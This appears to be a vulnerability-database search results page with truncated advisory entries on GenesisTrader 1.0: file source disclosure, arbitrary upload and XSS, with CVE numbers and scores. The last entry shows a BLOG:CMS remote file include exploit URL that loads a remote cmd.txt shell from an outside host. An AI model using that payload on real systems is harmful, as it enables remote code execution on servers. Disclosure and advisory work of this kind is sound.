17 matches found
EUVD-2006-6552
Malware in sbrugna...
EUVD-2006-6554
Malware in sbrugna...
EUVD-2006-6553
Malware in sbrugna...
GenesisTrader 1.0 form.php Arbitrary File Source Disclosure
No description provided by source. source: http://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include multiple information-disclosure...
CVE-2006-6569
form.php in GenesisTrader 1.0 allows remote attackers to read source code for arbitrary files and obtain sensitive information via the (1) do and (2) chem parameters with a "modfich" floap parameter...
CVE-2006-6570
Unrestricted file upload vulnerability in upload.php in GenesisTrader 1.0 allows remote authenticated users to upload arbitrary files via unspecified vectors, possibly involving form.php and the ajoutfich "foap" action...
CVE-2006-6571
Multiple cross-site scripting (XSS) vulnerabilities in form.php in GenesisTrader 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) cuve, (2) chem, (3) do, and possibly other parameters...
CVE-2006-6569
CVE-2006-6569 affects GenesisTrader 1.0. The NVD description documents that form.php allows remote attackers to read source code for arbitrary files and obtain sensitive information via the (1) do and (2) chem parameters with a "modfich" floap parameter. CVSSv2 metrics report a base score of 7.8 ...
CVE-2006-6570
CVE-2006-6570 describes an unrestricted file upload in upload.php of GenesisTrader 1.0. The vulnerability allows remote authenticated users to upload arbitrary files through unspecified vectors, possibly involving form.php and the ajoutfich “foap” action. The available sources indicate a high-sev...
CVE-2006-6571
GenesisTrader 1.0 is affected by multiple XSS in form.php. The vulnerability allows remote attackers to inject arbitrary script/HTML via the (1) cuve, (2) chem, (3) do parameters. Connected sources also record a CVSS v2 base score of 6.8 (Medium). No remediation details are provided in the suppli...
CVE-2006-6569
form.php in GenesisTrader 1.0 allows remote attackers to read source code for arbitrary files and obtain sensitive information via the (1) do and (2) chem parameters with a "modfich" floap parameter...
CVE-2006-6570
Unrestricted file upload vulnerability in upload.php in GenesisTrader 1.0 allows remote authenticated users to upload arbitrary files via unspecified vectors, possibly involving form.php and the ajoutfich "foap" action...
CVE-2006-6571
Multiple cross-site scripting (XSS) vulnerabilities in form.php in GenesisTrader 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) cuve, (2) chem, (3) do, and possibly other parameters...
genesistrader10.txt
GenesisTrader v1.0 ------------------ Vendor site: http://www.genesis-php.com/ Product: GenesisTrader v1.0 Vulnerability: Source Code Disclosure, Arbitrary File Upload & XSS Credits: MrKaLiMaN Reported to Vendor: 06/12/06 Public disclosure: 14/12/06 Description: ------------ Source Code...
GenesisTrader 1.0 - 'form.php' Arbitrary File Source Disclosure
source: https://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include multiple information-disclosure vulnerabilities, an arbitrary file-upload...
GenesisTrader 1.0 - form.php Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include...
GenesisTrader v1.0 - Multiple Vulnerabilities
Hello BLOG:CMS Remote file include Vulnerability Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] admin/PLUGINs/NPUserSharing.php?DIRADMIN=http://www.soqor.net/tools/cmd.txt?admin WwW.SoQoR.NeT...